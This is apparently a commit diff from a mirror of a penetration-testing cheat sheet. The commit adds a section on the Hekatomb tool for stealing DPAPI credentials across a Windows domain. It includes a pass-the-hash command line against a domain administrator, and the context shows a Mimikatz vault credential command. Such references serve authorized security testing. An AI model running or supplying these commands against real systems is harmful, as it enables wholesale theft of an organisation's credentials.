mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-07 15:32:09 +00:00
Merge pull request #542 from Processus-Thief/master
Adding Hekatomb.py to DPAPI credentials stealing
This commit is contained in:
commit
c3421582bc
@ -14,6 +14,7 @@
|
|||||||
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
||||||
* [Task Scheduled credentials](#task-scheduled-credentials)
|
* [Task Scheduled credentials](#task-scheduled-credentials)
|
||||||
* [Vault](#vault)
|
* [Vault](#vault)
|
||||||
|
* [Hekatomb - Steal all credentials on domain](#hekatomb---Steal-all-credentials-on-domain)
|
||||||
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
||||||
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
@ -235,6 +236,22 @@ Attributes : 0
|
|||||||
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Hekatomb - Steal all credentials on domain
|
||||||
|
|
||||||
|
> Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations.
|
||||||
|
|
||||||
|
> Then it will download all DPAPI blob of all users from all computers.
|
||||||
|
|
||||||
|
> Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
|
||||||
|
|
||||||
|
```python
|
||||||
|
python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
|
||||||
|
```
|
||||||
|
|
||||||
|
<a href="https://github.com/Processus-Thief/HEKATOMB">https://github.com/Processus-Thief/HEKATOMB</a>
|
||||||
|
|
||||||
|
![Data in memory](https://docs.lestutosdeprocessus.fr/hekatomb.png)
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Commands list
|
## Mimikatz - Commands list
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user